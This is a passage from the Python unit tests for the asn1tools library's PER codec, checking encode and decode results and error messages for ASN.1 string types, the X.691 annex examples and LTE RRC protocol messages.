"K: Expected choice 'a', 'b', 'c', 'd', 'e', 'f', 'g' or 'h', but "
"got 'i'.")
# Bad value.
with self.assertRaises(asn1tools.EncodeError) as cm:
foo.encode('A',
('b', True),
check_types=False,
check_constraints=False)
self.assertEqual(str(cm.exception), "A: Expected choice 'a', but got 'b'.")
def test_utf8_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= SEQUENCE { "
" a BOOLEAN, "
" b UTF8String, "
" c UTF8String OPTIONAL"
"} "
"B ::= UTF8String (SIZE (10)) "
"C ::= UTF8String (SIZE (0..1)) "
"D ::= UTF8String (SIZE (2..3) ^ (FROM (\"a\"..\"g\"))) "
"E ::= UTF8String "
"END",
'per')
datas = [
('A', {'a': True, 'b': u''}, b'\x40\x00'),
('A',
{'a': True, 'b': u'1', 'c': u'foo'},
b'\xc0\x01\x31\x03\x66\x6f\x6f'),
('A',
{'a': True, 'b': 300 * u'1'},
b'\x40\x81\x2c' + 300 * b'\x31'),
('B',
u'1234567890',
b'\x0a\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30'),
('C', u'', b'\x00'),
('C', u'P', b'\x01\x50'),
('D', u'agg', b'\x03\x61\x67\x67'),
('E', u'bar', b'\x03\x62\x61\x72'),
('E', u'a\u1010c', b'\x05\x61\xe1\x80\x90\x63'),
('E',
15000 * u'123' + u'\u1010',
b'\xc2' + 10922 * b'123' + b'12\xaf\xcb3' + 4077 * b'123'
+ b'\xe1\x80\x90'),
('E', u'1Q', b'\x06\x31\xf0\x90\x88\x83\x51')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('A', b'\x40\xc5\x00\x00\x00\x00')
self.assertEqual(str(cm.exception),
'A.b: Bad length determinant fragmentation value 0xc5.')
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('A', b'\x40\xc1\x00\x00\x00\x00')
self.assertEqual(str(cm.exception),
'A.b: out of data (At bit offset: 16)')
def test_numeric_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= NumericString (FROM (\"0\"..\"2\", ..., \"4\"..\"5\")) "
"B ::= NumericString (SIZE (1..4)) "
"C ::= NumericString (SIZE (1..4, ...)) "
"D ::= NumericString (SIZE (1..4, ..., 6..7)) "
"E ::= NumericString (SIZE (0..MAX)) "
"F ::= NumericString (SIZE (2..MAX)) "
"END",
'per')
datas = [
('A', '2', b'\x01\x30'),
('B', '1234', b'\xc0\x23\x45'),
('C', '1234', b'\x60\x23\x45'),
('D', '1234', b'\x60\x23\x45'),
('E', '', b'\x00'),
('F', '345', b'\x03\x45\x60')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Encode size extension is not yet supported.
with self.assertRaises(NotImplementedError) as cm:
foo.encode('D', '123456')
self.assertEqual(
str(cm.exception),
"String size extension is not yet implemented.")
# Decode size extension is not yet supported.
with self.assertRaises(NotImplementedError) as cm:
foo.decode('D', b'\x80\x06\x23\x45\x67')
self.assertEqual(
str(cm.exception),
"String size extension is not yet implemented.")
def test_printable_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"D ::= SEQUENCE { "
" a BOOLEAN, "
" b PrintableString (SIZE (36)), "
" c BOOLEAN "
"} "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b PrintableString (SIZE (0..22)), "
" c BOOLEAN "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" b PrintableString, "
" c BOOLEAN "
"} "
"END",
'per')
datas = [
('D',
{'a': True, 'b': 12 * '123', 'c': True},
b'\x80\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31\x32\x33'
b'\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31\x32\x33\x31'
b'\x32\x33\x31\x32\x33\x80'),
('E',
{'a': True, 'b': '', 'c': True},
b'\x82'),
('E',
{'a': True, 'b': '1', 'c': True},
b'\x84\x31\x80'),
('F',
{'a': True, 'b': '123', 'c': True},
b'\x80\x03\x31\x32\x33\x80')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_ia5_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= IA5String "
"END",
'per')
datas = [
('A',
1638 * '1234567890' + '123',
b'\xbf\xff'
+ 1638 * b'\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30'
+ b'\x31\x32\x33'),
('A',
1638 * '1234567890' + '1234',
b'\xc1'
+ 1638 * b'\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30'
+ b'\x31\x32\x33\x34'
+ b'\x00'),
('A',
1638 * '1234567890' + '12345',
b'\xc1'
+ 1638 * b'\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30'
+ b'\x31\x32\x33\x34'
+ b'\x01'
+ b'\x35')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_visible_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= VisibleString (SIZE (19..133)) "
"B ::= VisibleString (SIZE (5)) "
"C ::= VisibleString (SIZE (19..1000)) "
"D ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (1)) "
"} "
"E ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (2)) "
"} "
"F ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (3)) "
"} "
"G ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (0..1)) "
"} "
"H ::= SEQUENCE { "
" a BOOLEAN, "
" b VisibleString (SIZE (0..2)) "
"} "
"I ::= VisibleString (FROM (\"a\"..\"z\")) (SIZE (1..255)) "
"J ::= VisibleString (FROM (\"a\")) "
"K ::= VisibleString (FROM (\"a\"..\"a\")) "
"END",
'per')
datas = [
('A',
'HejHoppHappHippAbcde',
b'\x02\x48\x65\x6a\x48\x6f\x70\x70\x48\x61\x70\x70\x48\x69\x70\x70'
b'\x41\x62\x63\x64\x65'),
('B', 'Hejaa', b'\x48\x65\x6a\x61\x61'),
('C',
17 * 'HejHoppHappHippAbcde',
b'\x01\x41' + 17 * (b'\x48\x65\x6a\x48\x6f\x70\x70\x48\x61\x70'
b'\x70\x48\x69\x70\x70\x41\x62\x63\x64\x65')),
('D', {'a': True, 'b': '1'}, b'\x98\x80'),
('E', {'a': True, 'b': '12'}, b'\x98\x99\x00'),
('F', {'a': True, 'b': '123'}, b'\x80\x31\x32\x33'),
('G', {'a': True, 'b': '1'}, b'\xcc\x40'),
('H', {'a': True, 'b': '1'}, b'\xa0\x31'),
('I', 'hej', b'\x02\x68\x65\x6a'),
('J', 'a', b'\x01'),
('K', 'a', b'\x01')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
# Bad character 0x19 should raise an exception.
with self.assertRaises(asn1tools.EncodeError) as cm:
foo.encode('A', '\x19', check_constraints=False)
self.assertEqual(
str(cm.exception),
"A: Expected a character in ' !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEF"
"GHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~', but got"
" '.' (0x19)'.")
def test_general_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= GeneralString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b GeneralString "
"} "
"END",
'per')
datas = [
('A', '', b'\x00'),
('A', '2', b'\x01\x32'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x4b')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_bmp_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= BMPString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b BMPString "
"} "
"C ::= SEQUENCE { "
" a BMPString (SIZE(1..128)), "
" b BMPString (SIZE(1..256)) "
"} "
"END",
'per')
datas = [
('A', '', b'\x00'),
('A', '123', b'\x03\x00\x31\x00\x32\x00\x33'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x00\x4b'),
('C',
{'a': '123', 'b': '123'},
b'\x04\x001\x002\x003\x02\x001\x002\x003')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode('A', b'\x01\xd8\x00')
valid_chars = [v for v in range(65536) if v < 0xd800 or v > 0xdfff]
self.assertEqual(str(cm.exception),
"A: Expected a value in %s, but got %d." % (valid_chars,
0xd800,))
def test_graphic_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= GraphicString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b GraphicString "
"} "
"END",
'per')
datas = [
('A', '', b'\x00'),
('A', '2', b'\x01\x32'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x4b')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_teletex_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= TeletexString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b TeletexString "
"} "
"END",
'per')
datas = [
('A', u'123', b'\x03\x31\x32\x33'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x4b')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_universal_string(self):
foo = asn1tools.compile_string(
"Foo DEFINITIONS AUTOMATIC TAGS ::= "
"BEGIN "
"A ::= UniversalString "
"B ::= SEQUENCE { "
" a BOOLEAN, "
" b UniversalString "
"} "
"END",
'per')
datas = [
('A',
u'åäö',
b'\x03\x00\x00\x00\xe5\x00\x00\x00\xe4\x00\x00\x00\xf6'),
('A',
u'1Q',
b'\x03\x00\x00\x00\x31\x00\x01\x02\x03\x00\x00\x00\x51'),
('B', {'a': False, 'b': u'K'}, b'\x00\x01\x00\x00\x00\x4b')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(foo, type_name, decoded, encoded)
def test_foo(self):
foo = asn1tools.compile_files('tests/files/foo.asn', 'per')
self.assertEqual(len(foo.types), 2)
self.assertTrue(foo.types['Question'] is not None)
self.assertTrue(foo.types['Answer'] is not None)
self.assertEqual(len(foo.modules), 1)
self.assertTrue(foo.modules['Foo'] is not None)
# Encode a question.
encoded = foo.encode('Question',
{'id': 1, 'question': 'Is 1+1=3?'})
self.assertEqual(encoded,
b'\x01\x01\x09\x49\x73\x20\x31\x2b\x31\x3d\x33\x3f')
# Decode the encoded question.
decoded = foo.decode('Question', encoded)
self.assertEqual(decoded, {'id': 1, 'question': 'Is 1+1=3?'})
# Encode an answer.
encoded = foo.encode('Answer', {'id': 1, 'answer': False})
self.assertEqual(encoded, b'\x01\x01\x00')
# Decode the encoded answer.
decoded = foo.decode('Answer', encoded)
self.assertEqual(decoded, {'id': 1, 'answer': False})
def test_decode_length(self):
foo = asn1tools.compile_files('tests/files/foo.asn', 'per')
with self.assertRaises(asn1tools.DecodeError) as cm:
foo.decode_length(b'')
self.assertEqual(str(cm.exception),
'Decode length is not supported for this codec.')
def test_versions(self):
foo = asn1tools.compile_files('tests/files/versions.asn', 'per')
# Encode as V1, decode as V1, V2 and V3
decoded_v1 = {
'userName': 'myUserName',
'password': 'myPassword',
'accountNumber': 54224445
}
encoded_v1 = foo.encode('V1', decoded_v1)
self.assertEqual(foo.decode('V1', encoded_v1), decoded_v1)
self.assertEqual(foo.decode('V2', encoded_v1), decoded_v1)
self.assertEqual(foo.decode('V3', encoded_v1), decoded_v1)
# Encode as V2, decode as V1, V2 and V3
decoded_v2 = {
'userName': 'myUserName',
'password': 'myPassword',
'accountNumber': 54224445,
'minutesLastLoggedIn': 5
}
encoded_v2 = foo.encode('V2', decoded_v2)
self.assertEqual(foo.decode('V1', encoded_v2), decoded_v1)
self.assertEqual(foo.decode('V2', encoded_v2), decoded_v2)
self.assertEqual(foo.decode('V3', encoded_v2), decoded_v2)
# Encode as V3, decode as V1, V2 and V3
decoded_v3 = {
'userName': 'myUserName',
'password': 'myPassword',
'accountNumber': 54224445,
'minutesLastLoggedIn': 5,
'certificate': None,
'thumb': None
}
encoded_v3 = foo.encode('V3', decoded_v3)
self.assertEqual(foo.decode('V1', encoded_v3), decoded_v1)
self.assertEqual(foo.decode('V2', encoded_v3), decoded_v2)
self.assertEqual(foo.decode('V3', encoded_v3), decoded_v3)
def test_x691_a1(self):
a1 = asn1tools.compile_files('tests/files/x691_a1.asn', 'per')
decoded = {
'name': {
'givenName': 'John',
'initial': 'P',
'familyName': 'Smith'
},
'title': 'Director',
'number': 51,
'dateOfHire': '19710917',
'nameOfSpouse': {
'givenName': 'Mary',
'initial': 'T',
'familyName': 'Smith'
},
'children': [
{
'name': {
'givenName': 'Ralph',
'initial': 'T',
'familyName': 'Smith'
},
'dateOfBirth': '19571111'
},
{
'name': {
'givenName': 'Susan',
'initial': 'B',
'familyName': 'Jones'
},
'dateOfBirth': '19590717'
}
]
}
encoded = (
b'\x80\x04\x4a\x6f\x68\x6e\x01\x50\x05\x53\x6d\x69\x74\x68\x01\x33'
b'\x08\x44\x69\x72\x65\x63\x74\x6f\x72\x08\x31\x39\x37\x31\x30\x39'
b'\x31\x37\x04\x4d\x61\x72\x79\x01\x54\x05\x53\x6d\x69\x74\x68\x02'
b'\x05\x52\x61\x6c\x70\x68\x01\x54\x05\x53\x6d\x69\x74\x68\x08\x31'
b'\x39\x35\x37\x31\x31\x31\x31\x05\x53\x75\x73\x61\x6e\x01\x42\x05'
b'\x4a\x6f\x6e\x65\x73\x08\x31\x39\x35\x39\x30\x37\x31\x37'
)
self.assert_encode_decode(a1, 'PersonnelRecord', decoded, encoded)
def test_x691_a2(self):
a2 = asn1tools.compile_files('tests/files/x691_a2.asn', 'per')
decoded = {
'name': {
'givenName': 'John',
'initial': 'P',
'familyName': 'Smith'
},
'title': 'Director',
'number': 51,
'dateOfHire': '19710917',
'nameOfSpouse': {
'givenName': 'Mary',
'initial': 'T',
'familyName': 'Smith'
},
'children': [
{
'name': {
'givenName': 'Ralph',
'initial': 'T',
'familyName': 'Smith'
},
'dateOfBirth': '19571111'
},
{
'name': {
'givenName': 'Susan',
'initial': 'B',
'familyName': 'Jones'
},
'dateOfBirth': '19590717'
}
]
}
encoded = (
b'\x86\x4a\x6f\x68\x6e\x50\x10\x53\x6d\x69\x74\x68\x01\x33\x08\x44'
b'\x69\x72\x65\x63\x74\x6f\x72\x19\x71\x09\x17\x0c\x4d\x61\x72\x79'
b'\x54\x10\x53\x6d\x69\x74\x68\x02\x10\x52\x61\x6c\x70\x68\x54\x10'
b'\x53\x6d\x69\x74\x68\x19\x57\x11\x11\x10\x53\x75\x73\x61\x6e\x42'
b'\x10\x4a\x6f\x6e\x65\x73\x19\x59\x07\x17'
)
self.assert_encode_decode(a2, 'PersonnelRecord', decoded, encoded)
def test_x691_a3(self):
a3 = asn1tools.compile_files('tests/files/x691_a3.asn', 'per')
decoded = {
'name': {
'givenName': 'John',
'initial': 'P',
'familyName': 'Smith'
},
'title': 'Director',
'number': 51,
'dateOfHire': '19710917',
'nameOfSpouse': {
'givenName': 'Mary',
'initial': 'T',
'familyName': 'Smith'
},
'children': [
{
'name': {
'givenName': 'Ralph',
'initial': 'T',
'familyName': 'Smith'
},
'dateOfBirth': '19571111'
},
{
'name': {
'givenName': 'Susan',
'initial': 'B',
'familyName': 'Jones'
},
'dateOfBirth': '19590717',
'sex': 'female'
}
]
}
encoded = (
b'\x40\xc0\x4a\x6f\x68\x6e\x50\x08\x53\x6d\x69\x74\x68\x00\x00\x33'
b'\x08\x44\x69\x72\x65\x63\x74\x6f\x72\x00\x19\x71\x09\x17\x03\x4d'
b'\x61\x72\x79\x54\x08\x53\x6d\x69\x74\x68\x01\x00\x52\x61\x6c\x70'
b'\x68\x54\x08\x53\x6d\x69\x74\x68\x00\x19\x57\x11\x11\x82\x00\x53'
b'\x75\x73\x61\x6e\x42\x08\x4a\x6f\x6e\x65\x73\x00\x19\x59\x07\x17'
b'\x01\x01\x40'
)
self.assert_encode_decode(a3, 'PersonnelRecord', decoded, encoded)
def test_x691_a4(self):
a4 = asn1tools.compile_dict(deepcopy(X691_A4), 'per')
decoded = {
'a': 253,
'b': True,
'c': ('e', True),
'g': '123',
'h': True
}
encoded = (
b'\x9e\x00\x01\x80\x01\x02\x91\xa4'
)
self.assert_encode_decode(a4, 'Ax', decoded, encoded)
def test_rrc_8_6_0(self):
rrc = asn1tools.compile_dict(deepcopy(RRC_8_6_0), 'per')
# Message 1.
decoded = {
'message': (
'c1',
(
'paging',
{
'systemInfoModification': 'true',
'nonCriticalExtension': {
}
}
)
)
}
encoded = b'\x28'
self.assert_encode_decode(rrc, 'PCCH-Message', decoded, encoded)
# Message 2.
decoded = {
'message': (
'c1',
(
'paging', {
}
)
)
}
encoded = b'\x00'
self.assert_encode_decode(rrc, 'PCCH-Message', decoded, encoded)
# Message 3.
decoded = {
'message': {
'dl-Bandwidth': 'n6',
'phich-Config': {
'phich-Duration': 'normal',
'phich-Resource': 'half'
},
'systemFrameNumber': (b'\x12', 8),
'spare': (b'\x34\x40', 10)
}
}
encoded = b'\x04\x48\xd1'
self.assert_encode_decode(rrc, 'BCCH-BCH-Message', decoded, encoded)
# Message #4.
decoded = {
'message': (
'c1',
(
'systemInformation',
{
'criticalExtensions': (
'systemInformation-r8',
{
'sib-TypeAndInfo': [
(
'sib2',
{
'ac-BarringInfo': {
'ac-BarringForEmergency': True,
'ac-BarringForMO-Data': {
'ac-BarringFactor': 'p95',
'ac-BarringTime': 's128',
'ac-BarringForSpecialAC': (b'\xf0', 5)
}
},
'radioResourceConfigCommon': {
'rach-ConfigCommon': {
'preambleInfo': {
'numberOfRA-Preambles': 'n24',
'preamblesGroupAConfig': {
'sizeOfRA-PreamblesGroupA': 'n28',
'messageSizeGroupA': 'b144',
'messagePowerOffsetGroupB': 'minusinfinity'
}
},
'powerRampingParameters': {
'powerRampingStep': 'dB0',
'preambleInitialReceivedTargetPower': 'dBm-102'
},
'ra-SupervisionInfo': {
'preambleTransMax': 'n8',
'ra-ResponseWindowSize': 'sf6',
'mac-ContentionResolutionTimer': 'sf48'
},
'maxHARQ-Msg3Tx': 8
},
'bcch-Config': {
'modificationPeriodCoeff': 'n2'
},
'pcch-Config': {
'defaultPagingCycle': 'rf256',
'nB': 'twoT'
},
'prach-Config': {
'rootSequenceIndex': 836,
'prach-ConfigInfo': {
'prach-ConfigIndex': 33,
'highSpeedFlag': False,
'zeroCorrelationZoneConfig': 10,
'prach-FreqOffset': 64
}
},
'pdsch-ConfigCommon': {
'referenceSignalPower': -60,
'p-b': 2
},
'pusch-ConfigCommon': {
'pusch-ConfigBasic': {
'n-SB': 1,
'hoppingMode': 'interSubFrame',
'pusch-HoppingOffset': 10,
'enable64QAM': False
},
'ul-ReferenceSignalsPUSCH': {
'groupHoppingEnabled': True,
'groupAssignmentPUSCH': 22,
'sequenceHoppingEnabled': False,
'cyclicShift': 5
}
},
'pucch-ConfigCommon': {
'deltaPUCCH-Shift': 'ds1',
'nRB-CQI': 98,
'nCS-AN': 4,
'n1PUCCH-AN': 2047
},
'soundingRS-UL-ConfigCommon': (
'setup',
{
'srs-BandwidthConfig': 'bw0',
'srs-SubframeConfig': 'sc4',
'ackNackSRS-SimultaneousTransmission': True
}),
'uplinkPowerControlCommon': {
'p0-NominalPUSCH': -126,
'alpha': 'al0',
'p0-NominalPUCCH': -127,
'deltaFList-PUCCH': {
'deltaF-PUCCH-Format1': 'deltaF-2',
'deltaF-PUCCH-Format1b': 'deltaF1',
'deltaF-PUCCH-Format2': 'deltaF0',
'deltaF-PUCCH-Format2a': 'deltaF-2',
'deltaF-PUCCH-Format2b': 'deltaF0'
},
'deltaPreambleMsg3': -1
},
'ul-CyclicPrefixLength': 'len1'
},
'ue-TimersAndConstants': {
't300': 'ms100',
't301': 'ms200',
't310': 'ms50',
'n310': 'n2',
't311': 'ms30000',
'n311': 'n2'
},
'freqInfo': {
'additionalSpectrumEmission': 3
},
'timeAlignmentTimerCommon': 'sf500'
}
),
(
'sib3',
{
'cellReselectionInfoCommon': {
'q-Hyst': 'dB0',
'speedStateReselectionPars': {
'mobilityStateParameters': {
't-Evaluation': 's180',
't-HystNormal': 's180',
'n-CellChangeMedium': 1,
'n-CellChangeHigh': 16
},
'q-HystSF': {
'sf-Medium': 'dB-6',
'sf-High': 'dB-4'
}
}
},
'cellReselectionServingFreqInfo': {
'threshServingLow': 7,
'cellReselectionPriority': 3
},
'intraFreqCellReselectionInfo': {
'q-RxLevMin': -33,
's-IntraSearch': 0,
'presenceAntennaPort1': False,
'neighCellConfig': (b'\x80', 2),
't-ReselectionEUTRA': 4
}
}
),
(
'sib4',
{
}
),
(
'sib5',
{
'interFreqCarrierFreqList': [
{
'dl-CarrierFreq': 1,
'q-RxLevMin': -45,
't-ReselectionEUTRA': 0,
'threshX-High': 31,
'threshX-Low': 29,
'allowedMeasBandwidth': 'mbw6',
'presenceAntennaPort1': True,
'neighCellConfig': (b'\x00', 2),
'q-OffsetFreq': 'dB0'
}
]
}
),
(
'sib6',
{
't-ReselectionUTRA': 3
}
),
(
'sib7',
{
't-ReselectionGERAN': 3
}
),
(
'sib8',
{
'parameters1XRTT': {
'longCodeState1XRTT': (b'\x01\x23\x45\x67\x89\x00', 42)
}
}
),
(
'sib9',
{
'hnb-Name': b'4'
}
),
(
'sib10',
{
'messageIdentifier': (b'#4', 16),
'serialNumber': (b'\x124', 16),
'warningType': b'2\x12'
}
),
(
'sib11',
{
'messageIdentifier': (b'g\x88', 16),
'serialNumber': (b'T5', 16),
'warningMessageSegmentType': 'notLastSegment',
'warningMessageSegmentNumber': 19,
'warningMessageSegment': b'\x12'
}
)
]
}
)
}
)
)
}
encoded = (
b'\x04\x81\x3f\xbe\x2a\x64\x12\xb2\xf3\x20\x03\x44\x85\x50\x00\x40'
b'\x53\x65\x31\x40\x07\xff\x82\x40\x00\x01\x10\x02\x4e\x20\x80\x50'
b'\x6c\x3c\x47\x69\x28\x14\x10\x0c\x00\x00\x00\x01\x64\x7f\xa2\x10'
b'\x19\x43\x30\x50\x01\x23\x45\x67\x89\x0e\x80\x34\x40\x46\x68\x24'
b'\x68\x64\x24\x91\x9e\x21\x50\xd4\x98\x01\x12'
)
self.assert_encode_decode(rrc, 'BCCH-DL-SCH-Message', decoded, encoded)
def test_all_types_automatic_tags(self):
all_types = asn1tools.compile_files(
'tests/files/all_types_automatic_tags.asn', 'per')
datas = [
('Sequence3', {'a': 1, 'c': 2,'d': True}, b'\x00\x01\x01\x01\x02\x80')
]
for type_name, decoded, encoded in datas:
self.assert_encode_decode(all_types, type_name, decoded, encoded)
def test_bar(self):
"""A simple example.
"""
bar = asn1tools.compile_files('tests/files/bar.asn', 'per')
# Message 1.
decoded = {
'headerOnly': True,
'lock': False,
'acceptTypes': {
'standardTypes': [(b'\x40', 2), (b'\x80', 1)]
},
'url': b'/ses/magic/moxen.html'
}
encoded = (
b'\xd0\x02\x02\x40\x01\x80\x15\x2f\x73\x65\x73\x2f\x6d\x61\x67\x69'
b'\x63\x2f\x6d\x6f\x78\x65\x6e\x2e\x68\x74\x6d\x6c'
)
self.assert_encode_decode(bar, 'GetRequest', decoded, encoded)
# Message 2.
decoded = {
'headerOnly': False,
'lock': False,
'url': b'0'
}
encoded = b'\x00\x01\x30'
self.assert_encode_decode(bar, 'GetRequest', decoded, encoded)
def test_repr_all_types(self):
all_types = asn1tools.compile_files('tests/files/all_types.asn',
'per')
self.assertEqual(repr(all_types.types['Boolean']), 'Boolean(Boolean)')
self.assertEqual(repr(all_types.types['Integer']), 'Integer(Integer)')
self.assertEqual(repr(all_types.types['Bitstring']), 'BitString(Bitstring)')
self.assertEqual(repr(all_types.types['Octetstring']),
'OctetString(Octetstring)')
self.assertEqual(repr(all_types.types['Null']), 'Null(Null)')
self.assertEqual(repr(all_types.types['Objectidentifier']),
'ObjectIdentifier(Objectidentifier)')
self.assertEqual(repr(all_types.types['Enumerated']),
'Enumerated(Enumerated)')
self.assertEqual(repr(all_types.types['Utf8string']),
'UTF8String(Utf8string)')
self.assertEqual(repr(all_types.types['Sequence']), 'Sequence(Sequence, [])')
self.assertEqual(repr(all_types.types['Set']), 'Set(Set, [])')
self.assertEqual(repr(all_types.types['Sequence2']),
'Sequence(Sequence2, [Integer(a)])')
self.assertEqual(repr(all_types.types['Set2']), 'Set(Set2, [Integer(a)])')
self.assertEqual(repr(all_types.types['Numericstring']),
'NumericString(Numericstring)')
self.assertEqual(repr(all_types.types['Printablestring']),
'PrintableString(Printablestring)')
self.assertEqual(repr(all_types.types['Ia5string']), 'IA5String(Ia5string)')
self.assertEqual(repr(all_types.types['Universalstring']),
'UniversalString(Universalstring)')
self.assertEqual(repr(all_types.types['Visiblestring']),
'VisibleString(Visiblestring)')
self.assertEqual(repr(all_types.types['Generalstring']),
'GeneralString(Generalstring)')
self.assertEqual(repr(all_types.types['Bmpstring']),
'BMPString(Bmpstring)')
self.assertEqual(repr(all_types.types['Teletexstring']),
'TeletexString(Teletexstring)')
self.assertEqual(repr(all_types.types['Graphicstring']),
'GraphicString(Graphicstring)')
self.assertEqual(repr(all_types.types['Utctime']), 'UTCTime(Utctime)')
self.assertEqual(repr(all_types.types['SequenceOf']),
'SequenceOf(SequenceOf, Integer())')
self.assertEqual(repr(all_types.types['SetOf']), 'SetOf(SetOf, Integer())')
self.assertEqual(repr(all_types.types['Choice']), "Choice(Choice, ['a'])")
self.assertEqual(repr(all_types.types['Any']), 'Any(Any)')
self.assertEqual(repr(all_types.types['Sequence12']),
'Sequence(Sequence12, [SequenceOf(a, Recursive(Sequence12))])')
def test_s1ap_14_4_0(self):
# ToDo: Do not skip!
return
with self.assertRaises(asn1tools.CompileError):
s1ap = asn1tools.compile_dict(deepcopy(S1AP_14_4_0), 'per')
# Message 1.
decoded_message = (
'successfulOutcome',
{
'procedureCode': 17,
'criticality': 'reject',
'value': {
'protocolIEs': [
{
'id': 105,
'criticality': 'reject',
'value': [
{
'servedPLMNs': [
b'\xab\xcd\xef',
b'\x12\x34\x56'
],
'servedGroupIDs': [
b'\x22\x22'
],
'servedMMECs': [
b'\x11'
]
}
]
}
]
}
}
)
encoded_message = (
b'\x20\x11\x00\x15\x00\x00\x01\x00\x69\x00\x0e\x00\x40\xab\xcd\xef'
b'\x12\x34\x56\x00\x00\x22\x22\x00\x11'
)
encoded = s1ap.encode('S1AP-PDU', decoded_message)
self.assertEqual(encoded, encoded_message)
def test_information_object(self):
# ToDo: Fix when supported.
return
information_object = asn1tools.compile_files(
'tests/files/information_object.asn', 'per')
# Message 1 - without constraints.
decoded_message = {
'id': 0,
'value': b'\x05',
'comment': 'item 0',
'extra': 2
}
encoded_message = (
b'\x01\x00\x01\x05\x06\x69\x74\x65\x6d\x20\x30\x01\x02'
)
self.assert_encode_decode(information_object,
'ItemWithoutConstraints',
decoded_message,
encoded_message)
# Message 1 - with constraints.
decoded_message = {
'id': 0,
'value': True,
'comment': 'item 0',
'extra': 2
}
encoded_message = (
b'\x01\x00\x01\x80\x06\x69\x74\x65\x6d\x20\x30\x01\x02'
)
# ToDo: Constraints are not yet implemented.
with self.assertRaises(TypeError) as cm:
self.assert_encode_decode(information_object,
'ItemWithConstraints',
decoded_message,
encoded_message)
self.assertEqual(str(cm.exception), "object of type 'bool' has no len()")
# Message 2.
decoded_message = {
'id': 1,
'value': {
'myValue': 7,
'myType': 0
},
'comment': 'item 1',
'extra': 5
}
encoded_message = (
b'\x01\x01\x05\x02\x01\x07\x01\x00\x06\x69\x74\x65\x6d\x20\x31\x01'
b'\x05'
)
# ToDo: Constraints are not yet implemented.
with self.assertRaises(TypeError):
self.assert_encode_decode(information_object,
'ItemWithConstraints',
decoded_message,
encoded_message)
# Message 3 - error class.
decoded_message = {
'errorCategory': 'A',
'errors': [
{
'errorCode': 1,
'errorInfo': 3
},
{
'errorCode': 2,
'errorInfo': True
}
]
}
encoded_message = (
b'\x41\x02\x01\x01\x02\x01\x03\x01\x02\x01\x80'
)
# ToDo: Constraints are not yet implemented.
with self.assertRaises(TypeError):
self.assert_encode_decode(information_object,
'ErrorReturn',
decoded_message,
encoded_message)
# Message 4 - C.
decoded_message = {
'a': 0
}
encoded_message = (
b'\x00\x01\x00'
)
encoded = information_object.encode('C', decoded_message)
self.assertEqual(encoded, encoded_message)
# Message 5 - C.
decoded_message = {
'a': 0,
'b': {
'a': 0
}
}
encoded_message = (
b'\x80\x01\x00\x03\x00\x01\x00'
)
with self.assertRaises(TypeError):
encoded = information_object.encode('C', decoded_message)
self.assertEqual(encoded, encoded_message)
# Message 6 - C.
decoded_message = {
'a': 0,
'b': {
'a': 0,
'b': {
'a': 0,
'b': {
'a': 0
}
}
}
}
encoded_message = (
b'\x80\x01\x00\x0b\x80\x01\x00\x07\x80\x01\x00\x03\x00\x01\x00'
)
with self.assertRaises(TypeError):
encoded = information_object.encode('C', decoded_message)
self.assertEqual(encoded, encoded_message)
def test_oma_ulp(self):
ulp = asn1tools.compile_dict(deepcopy(OMA_ULP), 'per')
decoded = {
'length': 162,
